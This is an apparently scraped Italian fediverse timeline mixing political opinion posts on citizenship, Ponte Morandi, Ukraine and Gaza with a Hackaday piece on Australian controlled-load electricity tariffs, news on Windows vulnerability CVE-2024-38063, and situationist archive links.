fiato corto, che non tengono conto di quanto questo Paese, malgrado l’assenza o l’ostilità della politica, sia profondamente cambiato.

Oggi ci sono in Italia oltre 5 milioni di persone che vivono regolarmente sul territorio nazionale e almeno altre 500 mila che, usufruendo di percorsi di regolarizzazione, potrebbero affrancarsi dal ricatto del lavoro nero. Fermo restando che bisognerebbe spiegare, a chi ne parla a sproposito, che la cittadinanza dovrebbe essere un diritto e non una concessione, una lotta vera su questo tema dovrebbe porsi obiettivi più ambiziosi. Nel 2011 partì la raccolta firme per due leggi di iniziativa popolare lanciata dalla Campagna “L’Italia sono anch’io”, di cui anche Rifondazione fece parte insieme a sindacati, mondo dell’associazionismo laico e cattolico, intellettuali e quant’altro. Le proposte che raccolsero complessivamente oltre 200 mila firme, sostenevano hic et nunc due cambiamenti. Il passaggio diretto allo ius soli (se nasci in Italia sei italiana/o almeno che tu poi non decida di rinunciarci, unita al dimezzamento di richiesta e ottenimento della cittadinanza, senza vincoli economici e, richiesta frettolosamente abbandonata, la ratifica del Capitolo C, Art 6 della Convenzione di Strasburgo. L’Italia non ha mai voluto accettare questo Capitolo secondo cui chi risiede in maniera stabile in un Paese deve aver accesso al diritto di voto attivo e passivo alle elezioni amministrative. Se tale ratifica fosse avvenuta anche durante i governi di centro sinistra molto probabilmente i partito che hanno costruito il proprio successo sulla caccia all’immigrato dovrebbero fare i conti, almeno a livello locale, con un elettorato non soltanto autoctono da generazioni e magari alcune vergognose politiche discriminatorie si sarebbero evitate. Si pensi ai territori oggi leghisti o in mano a FdI, in cui il voto di uomini e donne non nati/e in Italia, sarebbe determinante per eleggere un Sindaco.

E se nell’Italia meloniana fosse questo il momento in cui alzare l’asticella e, insieme alle tante e ai tanti uomini e donne che lavorano o studiano qui, che sono parte attiva della società del presente, fosse il giunto il momento di osare di più? Di non accontentarsi del meno peggio in nome di qualche voto in più in Parlamento pagato a caro prezzo? Occorrerebbe che su questo tema si aprisse uno spazio pubblico di riflessione e di costruzione di vertenze. C’è chi ha già lanciato l’idea di un referendum, difficile capire se sia questo lo strumento migliore, ma intanto, far precipitare, nei diversi mondi solidali e di interconnessione, l’idea che possa partire una grande campagna, anche culturale, per riportare le persone a ragionare sull’importanza di una società con diritti garantiti a tutte/i e basata sulla convivenza è un dovere politico. Cittadinanza e diritto di voto trascinano con se a valanga il contrasto alle politiche securitarie e all’abolizione del diritto d’asilo, alla criminalizzazione di chi salva le persone, all’ampliamento di Centri di detenzione, anche fuori dai confini nazionali, destinati a rimpatriare chi non è considerato degno di ricevere protezione. E un contrasto netto infine alla dimensione europea assunta col Patto sulle migrazioni che dovrebbe entrare in vigore nel 2026 e che rende l’intero continente ancor più fortezza in tempi di guerra.

Non si tratta di un tema marginale ma fondamentale per affrontare l’arretratezza di un suprematismo istituzionale che è divenuto anche sub cultura di massa. Un tema in cui non si possono avere posizioni di compromesso, chi le fa proprie è parte del problema, ci si deve schierare con schiettezza e senza alibi, da una parte o dall’altra.

*Responsabile nazionale immigrazione, Partito della Rifondazione Comunista – Sinistra Europea



L'intelligenza artificiale e la "collusione algoritmica" favoriscono la nascita di nuovi cartelli dei prezzi.

theatlantic.com/ideas/archive/…



Kroger, una catena che dal 2018 usa display che cambiano i prezzi dei prodotti in tempo reale in base alle informazioni demografiche dei clienti (in partnership con Microsoft), adesso si allea con una impresa di IA per una "incomparabile ottimizzazio…

RFanciola reshared this.



L'ICANN ha finalmente deciso che il TLD .internal sarà riservato, in modo che si possa usare tranquillamente in reti private.

theregister.com/2024/08/08/dot…



Austraila’s Controlled Loads Are In Hot Water


Australian grids have long run a two-tiered pricing scheme for electricity. In many jurisdictions, regular electricity was charged at a certain rate. Meanwhile, you could get cheaper electricity for certain …read more https://hackaday.com/2024/08/15/aust

18209678

Australian grids have long run a two-tiered pricing scheme for electricity. In many jurisdictions, regular electricity was charged at a certain rate. Meanwhile, you could get cheaper electricity for certain applications if your home was set up with a “controlled load.” Typically, this involved high energy equipment like pool heaters or hot water heaters.

This scheme has long allowed Australians to save money while keeping their water piping-hot at the same time. However, the electrical grid has changed significantly in the last decade. These controlled loads are starting to look increasingly out of step with what the grid and the consumer needs. What is to be done?

Controlled What Now?

18209680Hot water heaters can draw in excess of 5 kW for hours on end when warming up. Electrical authorities figured that it would be smart to take this huge load on the grid, and shift it to night time, a period of otherwise low demand. Credit: Lewin Day
In Australia, the electricity grid has long relied on a system of “controlled loads” to manage the energy demand from high-consumption appliances, particularly electric hot water heaters. These controlled loads were designed to take advantage of periods when overall electricity demand was lower, traditionally at night. By scheduling energy-intensive activities like heating water during these off-peak hours, utilities could balance the load on the grid and reduce the need for additional power generation capacity during peak times. In turn, households would receive cheaper off-peak electricity rates for energy used by their controlled load.

This system was achieved quite simply. Households would have a special “controlled load” meter in their electrical box. This would measure energy use by the hot water heater, or whatever else the electrical authority had allowed to be hooked up in this manner. The controlled load meter would be set on a timer so the attached circuit would only be powered in the designated off-peak times. Meanwhile, the rest of the home’s electrical circuits would be connected to the main electrical meter which would provide power 24 hours a day.

By and large, this system worked well. However, it did lead to more than a few larger families running out of hot water on the regular. For example, you might have had a 250 liter hot water heater. Hooked up as a controlled load, it would heat up overnight and switch off around 7 AM. Two or three showers later, the hot water heater would have delivered all its hot water, and you’d be stuck without any more until it switched back on at night.

Historically, most electric hot water heaters were set to run during the low-demand night period, typically after 10 PM. Historically, the demand for electricity was low at this time, while peak demand was in the day time. It made sense to take the huge load from everyone’s hot water system, and move all that demand to the otherwise quiet night period. This lowered the daytime peak, reducing demand on the grid, in turn slashing infrastructure and generation costs. It had the effect of keeping the demand curve flatter throughout the whole 24-hour period.

This strategy was particularly effective in a grid predominantly powered by coal-fired power stations, which operated most efficiently when running continuously at a stable output. By shifting the hot water heating load to nighttime, utilities could maintain a more consistent demand for electricity throughout the day and night, reducing the need for sudden increases in generation capacity during peak times.

1820968218209684

Everything Changed

18209686The Australian grid now sees large peaks in solar generation during the day. Credit: APVI.org.au via screenshot
However, the energy landscape in Australia has undergone a significant transformation in recent years. This has been primarily driven by the rapid growth of renewable energy sources, particularly home solar generation. As a result, the dynamics of electricity supply and demand have changed, prompting a reevaluation of the traditional approach to controlled loads.

Renewable energy has completely changed the way supply and demand works in the Australian grid. These days, energy is abundant while the sun is up. During the middle of the day, wholesale energy prices routinely plummet below $0.10 / kWh as the sun bears down on thousands upon thousands of solar panels across the country. Energy becomes incredibly cheap. Meanwhile, at night, energy is now very expensive. The solar panels are all contributing nothing, and it becomes the job of coal and gas generators to carry the majority of the burden. Fossil fuels are increasingly expensive, and spikes in the wholesale price are not uncommon, at times exceeding $10 / kWh.

Solar power generation peaks are now so high that Australian cities often produce more electricity than is needed to meet demand. This excess solar energy has led to periods where electricity prices can be very low, or even negative, due to the abundance of renewable energy on the grid. As a result, there is a growing argument that it now makes more sense to shift controlled loads, such as hot water heaters, to run during the daytime rather than at night.
18209688The rise of home solar generation has created unexpected flow-on effects for Australia’s power grid. Credit: Wayne National Forest, CC BY 2.0
Shifting controlled loads to the daytime would help absorb the surplus solar energy. This would reduce the need for grid authorities to kick renewable generators off the grid in times of excess. It would also help mitigate the so-called “duck curve” effect, where the demand for electricity sharply increases in the late afternoon and early evening as solar generation declines, leading to a steep ramp-up in non-renewable generation. By using excess solar energy to power controlled loads during the day, the overall demand on the grid would be more balanced, and the reliance on fossil fuels during peak times could be reduced.

Implementing this shift would require adjustments to the current tariff structures and perhaps the installation of smart meters capable of dynamically managing when controlled loads are activated based on real-time grid conditions. In a blessed serendipity, some Australian states—like Victoria—have already achieved near-100% penetration of smart meters. Others are still in the process of rollout, aiming for near 100% coverage by 2030. While these changes would involve some initial investment, the long-term benefits, including greater integration of renewable energy, reduced carbon emissions, and potentially lower electricity costs for consumers, make it a compelling option.

Fundamentally, it makes no sense for controlled loads to continue running as they have done for decades. Millions of Australians are now paying to heat their water during higher-demand periods where energy is more expensive. This can be particularly punitive for those on regularly-updated live tariffs that change with the current wholesale energy price. Those customers will sit by, watching cheap solar energy effectively go to waste during a sunny day, before their water heater finally kicks at night when the coal generators are going their hardest.

While the traditional approach to controlled loads in Australia has served the grid well in the past, the rise of renewable energy has changed things. The abundance of solar generation necessitates a rethinking of when these loads are scheduled. By shifting the operation of controlled loads like hot water heaters to the daytime, Australia can make better use of its abundant renewable energy resources, improve grid stability, and move closer to its sustainability goals. It’s a simple idea that makes a lot of sense. Here’s waiting for the broader power authorities to step up and make the change.



Un grave bug di sicurezza su Microsoft Windows con Score 9.8 di tipo “Wormable” porta all’RCE


Microsoft ha avvisato gli utenti di una vulnerabilità critica TCP/IP che consente l’esecuzione di codice remoto ( RCE ) su tutti i sistemi Windows con IPv6 abilitato per impostazione predefinita. Si tratta del CVE-2024-38063 (punteggio CVSS: 9,8), una vul

Microsoft ha avvisato gli utenti di una vulnerabilità critica TCP/IP che consente l’esecuzione di codice remoto ( RCE ) su tutti i sistemi Windows con IPv6 abilitato per impostazione predefinita.

Si tratta del CVE-2024-38063 (punteggio CVSS: 9,8), una vulnerabilità di Integer Underflow che può essere sfruttata dagli aggressori per causare un buffet overflow ed eseguire codice arbitrario su sistemi Windows 10, Windows 11 e Windows Server vulnerabili. Il bug è stato scoperto da un ricercatore di sicurezza del Kunlun Lab conosciuto con lo pseudonimo di XiaoWei.

XiaoWei ha sottolineato che, data la gravità della minaccia, non rivelerà ulteriori dettagli nel prossimo futuro. Il ricercatore ha inoltre osservato che il blocco di IPv6 attraverso il firewall locale di Windows non impedirà lo sfruttamento della vulnerabilità, poiché il bug viene attivato prima che il firewall elabori i pacchetti.

Microsoft ha spiegato nella sua comunicazione ufficiale che gli aggressori possono sfruttare il bug da remoto inviando ripetutamente pacchetti IPv6 appositamente predisposti. Il problema è caratterizzato da una bassa complessità di sfruttamento, che aumenta la probabilità del suo utilizzo negli attacchi. L’azienda ha notato che vulnerabilità simili sono state in passato oggetto di attacchi, il che rende questo errore particolarmente attraente per gli aggressori.

Per coloro che non possono installare immediatamente gli ultimi aggiornamenti di sicurezza, Microsoft consiglia di disattivare IPv6 per ridurre il rischio di attacchi. Tuttavia, l’azienda avverte che la disattivazione di IPv6 potrebbe causare il malfunzionamento di alcuni componenti di Windows , poiché il protocollo è una parte obbligatoria del sistema operativo.

Trend Micro ha definito ilCVE-2024-38063 una delle vulnerabilità più gravi risolte da Microsoft nell’ambito dell’attuale aggiornamento di sicurezza. L’azienda ha sottolineato che la vulnerabilità ha lo status di “wormable“, il che significa che può diffondersi tra i sistemi senza l’interazione dell’utente, in modo simile ai worm informatici. Trend Micro ha inoltre ricordato che IPv6 è abilitato per impostazione predefinita su quasi tutti i dispositivi, il che rende difficile prevenire gli attacchi.

L'articolo Un grave bug di sicurezza su Microsoft Windows con Score 9.8 di tipo “Wormable” porta all’RCE proviene da il blog della sicurezza informatica.



Attenzione messaggio sconveniente
Qui scriviamo il messaggio sconveniente


🌞 Buon Ferragosto dal #MIM!
📚 Quali libri state leggendo quest’estate? Quali sono stati i vostri preferiti di quest’anno?
#MIM



Questo è il riassunto del post

Prova da Friendica

Prova con testo colorato

Carattere Serif

20 pixel

2 pixel

80 pixel

This text is centered

acct:notizie@poliverso.org

@Test: palestra e allenamenti :-)




Pensieri d’estate: Synlab ha rotto! Questo articolo riguarda il data breach Synlab ed è stato preceduto da altri sullo stesso tema: https:/...


Fratelli d’Italia contro Elodie: “Attacca Meloni solo per vendere il calendario”


@Politica interna, europea e internazionale
Fratelli d’Italia contro Elodie: “Attacca Meloni solo per vendere il calendario” Fratelli d’Italia si scaglia contro Elodie dopo le parole di quest’ultima su Giorgia Meloni. In un’intervista a La Repubblica, infatti, la cantante ha dichiarato: “Non ho simpatia per questo governo, perché per me



A sei anni dalla tragedia del Ponte Morandi non si scorge ancora una luce in fondo al tunnel del processo. Se tutto andrà bene, la sentenza di primo grado per i 59 indagati arriverà nel 2026. Di coloro che hanno tratto il massimo profitto dalle mancate manutenzioni del viadotto, però, non risulta neppure l'ombra in tribunale. Anzi, a questi signori abbiamo pure offerto una generosa liquidazione pagando a peso d'oro le quote di Aspi.

Dopo trent'anni di Unione europea, lo Stato italiano non è neppure in grado di render giustizia alle vittime delle privatizzazioni selvagge e alle loro famiglie. L'unica cosa di cui sono capaci le nostre istituzioni ormai è proporre parole vuote, dense soltanto d'ipocrisia, mentre si procede a passo spedito sulla strada che ha distrutto il viadotto Polcevera e dilaniato il nostro Paese.

PRO ITALIA



Il ministero della Difesa Russo ha comunicato che un blindato di fabbricazione italiana Shield è stato distrutto in un bombardamento nella regione russa di Kursk. Quindi si presume che siano entrati in Russia con mezzi e armi Italiane.

Crosetto qualche giorno fa ci ha rassicurati che nessun armamento inviato a Zelensky dall'Italia è stato usato per invadere il territorio Russo. Tajani ha dichiarato che le armi italiane sul suolo Russo non si usano.

La donna, madre e Cristiana invece tace. Qui ci devono spiegare un paio di cosette: o non contano nulla nemmeno agli occhi di Zelensky, oppure ci stanno mentendo spudoratamente sapendo di mentire.

In tutto ciò ancora è segreto l'elenco delle armi inviate in Ucraina e dall'opposizione non si vede alcuna iniziativa concreta per fare chiarezza. Soprattutto da quel PD guidato da Elly Schlein che sembra la guardia del corpo di Meloni per quanto riguarda la posizione guerrafondaia e ultra atlantista assunta dall'Italia.

Traditori della patria!

T.me/GiuseppeSalamone



Sono mesi che la propaganda criminale occidentale ci racconta che gli Usa stiano lavorando per fermare la carneficina a Gaza, addirittura da un paio di settimane, mentre continuiamo a vedere bambini fatti a pezzi da Netanyahu, ci propongono a reti unificate le parole di Biden secondo le quali un cessate il fuoco è vicino.

Mentre i pennivendoli ci raccontano una narrazione volutamente distorta, dal Dipartimento di Stato Usa approvano vendite di armi per il criminale di guerra Netanyahu e lo stato terrorista di Israele per oltre 20 miliardi di dollari. Ripeto: 20 MILIARDI DI DOLLARI!

Una cinquantina di aerei per circa 19 miliardi di dollari; veicoli tattici, carri armati e missili per altri 2,1 miliardi di dollari. Inoltre si profila anche l'approvazione per equipaggiamento di aerei, lanciatori di missili aria-aria a medio raggio, cannoni M61A Vulcan e sistemi di posizionamento globale e di navigazione inerziale integrati.

Una lista della spesa che serve per continuare a massacrare i Palestinesi. Ora ditemi quale altro paese al mondo è presente in tutti i campi di battaglia più caldi ammassando armi: Ucraina, Palestina e Taiwan. Ditemi quale altro paese continua a lavorare per inasprire ogni singola zona di conflitto. Ditemi quale altro paese continua a fare profitti vendendo o regalando armi in giro per il mondo.

Ditemi quale altro Paese, al mondo, è più criminale degli Stati Uniti d'America e dello stato terrorista di israele.

T.me/GiuseppeSalamone
Giuseppe Salamone




Badilate sui denti per i propagandisti Nato Mauro, penna di Repubblica, Mieli e Quirico. Quelli che oggi sono considerati tra i migliori intellettuali italiani:

"La Russia sarebbe colpevole di avere infranto il diritto internazionale invadendo l’Ucraina. Poiché crediamo nella razionalità, patrimonio universale dell’umanità, vorremmo chiedere allo stimato giornalista se la violazione delle frontiere da parte della Nato a Belgrado, in Afghanistan, in Iraq, in Libia avrebbe dovuto implicare armi, addestramento militare, mercenari e scesa in campo dell’intelligence da parte di Cina e Russia a favore di quei Paesi aggrediti. Vorremmo anche chiedergli se l’ordine internazionale si viola soltanto oltrepassando le frontiere di uno Stato sovrano. L’espansionismo della Nato ai confini della Russia, unico Paese escluso dalla sicurezza collettiva, non calpesta l’indivisibilità della sicurezza in Europa sancita dai principi di Helsinki e traslata nella Carta di Parigi dell’Osce?" (Elena Basile)

T.me/GiuseppeSalamone





Inside the FBI's Dashboard for Wiretapping the World

Never-before-published screenshots of an internal FBI tool show how the agency monitored millions of messages from the secretly backdoored messaging app Anom.#News #Hacking



Il 14 agosto 2018 mi trovavo in vacanza ad Alassio da sola. Era una vacanza di "cura" dopo aver mollato definitivamente il mio ex abusatore.
La sera del 14, nel ristorante (buono!) dove sono andata a mangiare, il proprietario, chiacchierando con un amico o avventore abituale, riuscì a dare la colpa della tragedia agli immigrati.
Ne rimasi talmente scioccata che manco mi ricordo con quale volo pindarico della fantasia fosse riuscito a giungere a quella conclusione.
Ma come cazzo si fa?
Me lo chiesi allora e me lo chiedo ancora, ogni giorno.
Non può essere più facile prendersela con i più deboli che con chi detiene il potere di fare le cose per bene e invece le fa ammerda per proprio tornaconto.
Bisogna tenere d'occhio e spaccare le palle ai "controllori", non ai poveracci!
#PonteMorandi


guy debord @ ubuweb


slowforward.net/2024/08/14/guy…


Guy Debord (1931-1994)

Critique de la séparation (1961)
Hurlements en faveur de Sade (1952)
In Girum Imus Nocte Et Consumimur Igni (1978)
Refutation of All the Judgements, Pro or Con, Thus Far Rendered on the Film “The Society of the Spectacle” (1975)
Society of the Spectacle, Part 1 (1973)
Society of the Spectacle, Part 2 (1973)
Guy Debord, son art et son temps (1995)
Society of the Spectacle by Guy Debord with a new and unauthorized translation, voiceover by Paul Chan (2013)

Guy Debord was born in Paris on December 28, 1931. In 1950 Debord began his association with the Lettrist International, which was being led by Isidore Isou at the time. The Lettrists were attempting to fuse poetry and music, and were interested in transforming the urban landscape. In 1953 they mapped out what they called the “psychogeography” of Paris by walking through the city in a free-associative manner, or “drifts”. Texts on this activity were first published in Naked Lips in 1955 and 1956, in essays titled “Detournement: How to Use” and “Theory of the Derive.”

In 1957… →

slowforward.net/2024/08/14/guy…

#archive #archivi #archivio #cinema #GuyDebord #Situationism #Situazionismo #UbuWeb






Ita Airways nuovo sponsor della Juventus, ma Meloni fa saltare l’accordo


@Politica interna, europea e internazionale
Ci sarebbe il veto di Giorgia Meloni dietro lo stop all’accordo tra Ita Airways e la Juventus per fare della compagnia aerea il nuovo main sponsor del club torinese. Lo rivelano diverse indiscrezioni giornalistiche, secondo cui la presidente del Consiglio vuole evitare di dare altri



Ius Scholae, Lega contro Forza Italia: “La legge sulla cittadinanza va benissimo così com’è”


@Politica interna, europea e internazionale
Si apre uno scontro nella maggioranza di governo sul tema dello Ius Soli, anche se sarebbe più corretto parlare di Ius Scholae. L’apertura di Forza Italia a una revisione delle norme sulla concessione della cittadinanza italiana non è piaciuta alla Lega, che ha



Verso un’Europa della difesa, quale ruolo per l’Italia? Scrive Michele Nones

[quote]La costruzione dell’Europa della difesa è un processo lungo, complesso e tormentato che procede per “stop and go” e a velocità differenziate fra il livello comunitario, intergovernativo e multilaterale (quasi sempre bi o trilaterale). Nessuno è in grado di prevederne realisticamente



De Domenico (ONU): “Israele ci ha costretti a lasciare il nord di Gaza e ora vieta i visti per gli operatori”


@Notizie dall'Italia e dal mondo
Un estratto dell'intervista al direttore dell'Ufficio ONU per il coordinamento degli affari umanitari nei Territori palestinesi occupati (OCHA). Andrea De Domenico è stato costretto a lasciare



I veleni degli aeroporti che nessuno vuole vedere


@Notizie dall'Italia e dal mondo
Il nuovo articolo di @valori
In Europa si continuano a costruire aeroporti, senza curarsi del gigantesco impatto dei voli aerei. Sia per il clima, sia per la salute
L'articolo I veleni degli aeroporti che nessuno vuole vedere proviene da Valori.

valori.it/emissioni-aerei-aero…



Dagli Usa altri 20 miliardi di dollari di armi per Israele. Razzi di Hamas verso Tel Aviv


@Notizie dall'Italia e dal mondo
Il Pentagono riferisce che è stata approvata anche la vendita di 33mila proiettili per carri armati immediatamente disponibili
L'articolo Dagli Usa altri 20 miliardi di dollari di armi per Israele. Razzi di Hamas verso Tel Aviv



Flipboard rafforza il suo legame con il Fediverso, social web open source

@Che succede nel Fediverso?

Flipboard, un'app di social magazine dell'era Web 2.0 che si sta reinventando per capitalizzare la spinta rinnovata verso un social web aperto , sta rafforzando i suoi legami con il #Fediverso, il social network di server interconnessi che include app come Mastodon, Friendica, Pixelfed, PeerTube, Wordpress e, col tempo, Instagram Threads, tra le altre.
Giovedì, la società ha annunciato che sta espandendo le sue integrazioni del Fediverso ad altri 400 creatori di contenuti in Flipboard e che sta introducendo le notifiche del fediverso nell'app Flipboard stessa.

Quest'ultima novità consentirà agli utenti di #Flipboard di vedere i loro nuovi follower e altre attività relative ai contenuti che condividono nel fediverse direttamente nell'app Flipboard. Ciò segue l'introduzione dell'anno scorso di un'integrazione di Mastodon nell'app , in sostituzione di Twitter, e l'introduzione del supporto per ActivityPub , il protocollo di social networking che alimenta i social network open source e decentralizzati che includono Mastodon e altri software.

Link al post



installance #0189: asemic square


slowforward.net/2024/08/13/ins…



installance n. : # 0189type : asemic square size : ~ cm 6 x 6record : lowres shotadditional notes : abandoneddate : Aug 6th, 2024time : 4:31pmplace : Rome, via Lancianofootnote : ---copyright : (CC) 2024 differx
.

slowforward.net/2024/08/13/ins…

#000000 #0189 #abandoned #asemic #asemicSquare #card #i0189 #installance #installance0189




the ‘bureau of public secrets’: an astounding (situationist) archive


slowforward.net/2024/08/13/the…



bopsecrets.org/


bopsecrets.org/comics/return.h…

_
e ci sono anche…

Testi in Italiano

(Text in Italian)


Riflessioni preliminari sulla Guerra del Vietnam (Ngo Van, 1968)
Sulle lotte del Terzo Mondo (Ngo Van, 1968)
In questo teatro… (1970)
Ode sull’assenza di vera poesia oggi questo pomeriggio (1970)
Doppia riflessione (1974)
Avviso riguardo la società dominante e coloro che la contestano (1974)
I ciechi e l’elefante (1975)
La società del situazionismo (1976)
La realizzazione e la soppressione della religione (1977)
Lettera aperta al gruppo “Libertaire” di Tokio (1977)
La breccia in Iran (1979)
Banalità (1979)
La guerra e lo spettacolo (1991)
Sul film di René Viénet: Può la dialettica spezzare i mattoni? (1992)
Due saggi critici sul buddismo impegnato (1993 & 1999)
Confessioni di un garbato nemico dello stato (1997):
parte 1
parte 2
parte 3
Corrispondenza sulla questione della religione (1997-2000)
Riformismo y politica elettorale (2002)
Introduzione ai film di Guy Debord (2003)
Risposta ad un liberale del Midwest (2003)
Porta d’ingresso ai vasti domini (Introduzione) (2004)
Comprendere Debord dialetticamente (2005/2010)
Riflessioni sulla sollevazione in Francia (2006)
Documenti della sollevazione anti-CPE in Francia (2006)
Opinioni francofone sull’Ufficio dei Segreti Pubblici (2007-2008)
Ken Knabb, l’Internazionale Situazionista e la controcultura nord-americana (Jean-Pierre Depétris, 2008)
Introduzione al libro di Ngo Van In the Crossfire: Adventures of a Vietnamese Revolutionary (2010)
Nota sullo stalinismo e sul trotskismo (2010)
Il risveglio in America (2011)
Al di là del voto (2012/2016)

slowforward.net/2024/08/13/the…

#000000 #anarchy #archive #bureauOfPublicSecrets #dance #durruti #ffffff #internationalSituationist #KennethRexroth #Situationism #situationistInternational #Situazionismo